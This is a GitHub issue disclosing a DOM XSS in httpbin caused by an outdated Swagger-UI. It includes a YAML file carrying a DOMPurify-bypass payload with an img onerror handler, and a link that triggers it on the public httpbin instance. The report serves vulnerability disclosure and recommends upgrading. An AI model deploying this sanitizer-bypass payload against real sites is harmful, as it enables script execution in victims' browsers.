You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
httpbin uses an old version of Swagger-UI under the hood which is vulnerable to DOM XSS by adding a malicious yaml file as value to the query parameter url
Steps To Reproduce:
Host a malicious .yaml file with the payload inside:
swagger: '2.0'
info:
title: Example yaml.spec
description: |
<math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' onerror='alert(window.origin)'>">
paths:
/accounts:
get:
responses:
'200':
description: No response was specified
tags:
- accounts
operationId: findAccounts
summary: Finds all accounts
Visit the link https://httpbin.org?url=https://jumpy-floor.surge.sh/test.yaml. Here I use the publically availiable PoC posted on the reference article and the public instance of httpbin for ease. You can test it on another instance you spin up and use a payload you host if you preffer.
Upgrade Swagger-UI version to the latest which mitigates this.
A few notes
I sent you an email regarding this and got no reply so I am opening an issue here. Since there is anorher XSS reported 2 years ago or so and you haven't responded to that, I assume you don't care about XSS in general
However, I decided to report this for 2 reasons
It was already fixed by Swagger-UI and using the latest versions of dependencies is Security 101
I am a bug bounty hunter on hackerone.com. Most programs accept 0-day reports no earlier than after 30 days of publication. I've come across some instances of this and I want to report them and since I believe this is a 0-day I wanted to make it public for this reason.
Hello,
httpbin uses an old version of
Swagger-UI
under the hood which is vulnerable to DOM XSS by adding a malicious yaml file as value to the query parameterurl
Steps To Reproduce:
Supporting Material/References:
This is a bug in older SwaggerUI version that use an older version of DOMPurify to sanitize html. You can read more about it here: https://www.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers
Impact
Run javascript on the victim's broswer
Mitigation
Upgrade Swagger-UI version to the latest which mitigates this.
A few notes
I sent you an email regarding this and got no reply so I am opening an issue here. Since there is anorher XSS reported 2 years ago or so and you haven't responded to that, I assume you don't care about XSS in general
However, I decided to report this for 2 reasons
Best Regards,
rhinestonecowboy
The text was updated successfully, but these errors were encountered: